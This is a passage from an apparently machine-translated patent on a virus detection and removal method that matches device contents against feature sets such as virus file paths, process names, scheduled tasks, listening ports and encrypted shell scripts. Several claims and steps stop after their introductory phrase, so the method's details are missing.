Further, the second feature item set includes: monitoring port characteristics; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:

Further, the second feature item set includes: a communication tool feature; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:

Further, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, the virus killer program when executed by the processor further implements the following operations:

judging whether the current sample shell script is in an encrypted state;

It should be noted that, in this document, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or system that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or system. Without further limitation, an element defined by the phrase "comprising an … …" does not exclude the presence of other like elements in a process, method, article, or system that comprises the element.

The above-mentioned serial numbers of the embodiments of the present invention are merely for description and do not represent the merits of the embodiments.

Through the above description of the embodiments, those skilled in the art will clearly understand that the method of the above embodiments can be implemented by software plus a necessary general hardware platform, and certainly can also be implemented by hardware, but in many cases, the former is a better implementation manner. Based on such understanding, the technical solution of the present invention may be embodied in the form of a software product, which is stored in a storage medium (e.g., ROM/RAM, magnetic disk, optical disk) as described above and includes instructions for enabling a server (e.g., a mobile phone, a computer, a server, an air conditioner, or a network device) to execute the method according to the embodiments of the present invention.

The above description is only a preferred embodiment of the present invention, and not intended to limit the scope of the present invention, and all modifications of equivalent structures and equivalent processes, which are made by using the contents of the present specification and the accompanying drawings, or directly or indirectly applied to other related technical fields, are included in the scope of the present invention.

Claims

1. A virus killing method is characterized by comprising the following steps:

acquiring a set of objects to be detected in equipment to be detected;

2. The virus searching and killing method according to claim 1, wherein the first feature item set comprises: virus file path characteristics;

3. The virus searching and killing method according to claim 2, wherein the obtaining of the virus file path characteristics based on the first character string comprises,

judging whether the first character string contains a preset character or not;

4. The virus searching and killing method according to claim 1, wherein the first feature item set comprises: a virus process name characteristic;

5. The virus searching and killing method according to claim 1, wherein the first feature item set comprises: a timed task feature;

6. The virus searching and killing method according to claim 1, wherein the first feature item set comprises: a network connection tool feature;

7. The virus searching and killing method according to claim 1, wherein the matching the set of objects to be detected with the first set of feature items comprises,

8. The virus searching and killing method according to claim 7, wherein the second feature item set comprises: a virus filename feature for clearing other viruses;

9. The virus searching and killing method according to claim 7, wherein the second feature item set comprises: a virus process name feature for clearing other viruses;

10. The virus searching and killing method according to claim 7, wherein the second feature item set comprises: monitoring port characteristics;

11. The virus searching and killing method according to claim 10, wherein the obtaining of the listening port characteristic based on the seventh string comprises,

12. The virus searching and killing method according to claim 7, wherein the second feature item set comprises: a communication tool feature;

13. The virus killing method according to any one of claims 1 to 12, wherein the removing of the virus in the device to be tested comprises,

14. The virus killing method according to any one of claims 2 to 6 and 8 to 12, wherein after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, comprising,

judging whether the current sample shell script is in an encrypted state;

15. A virus killing device, comprising: a memory, a processor and a virus killer program stored on the memory and executable on the processor, the virus killer program being configured to implement the steps of the virus killing method of any one of claims 1 to 14.

16. A computer-readable storage medium, having a virus killing program stored thereon, which when executed by a processor, performs the steps of the virus killing method according to any one of claims 1 to 14.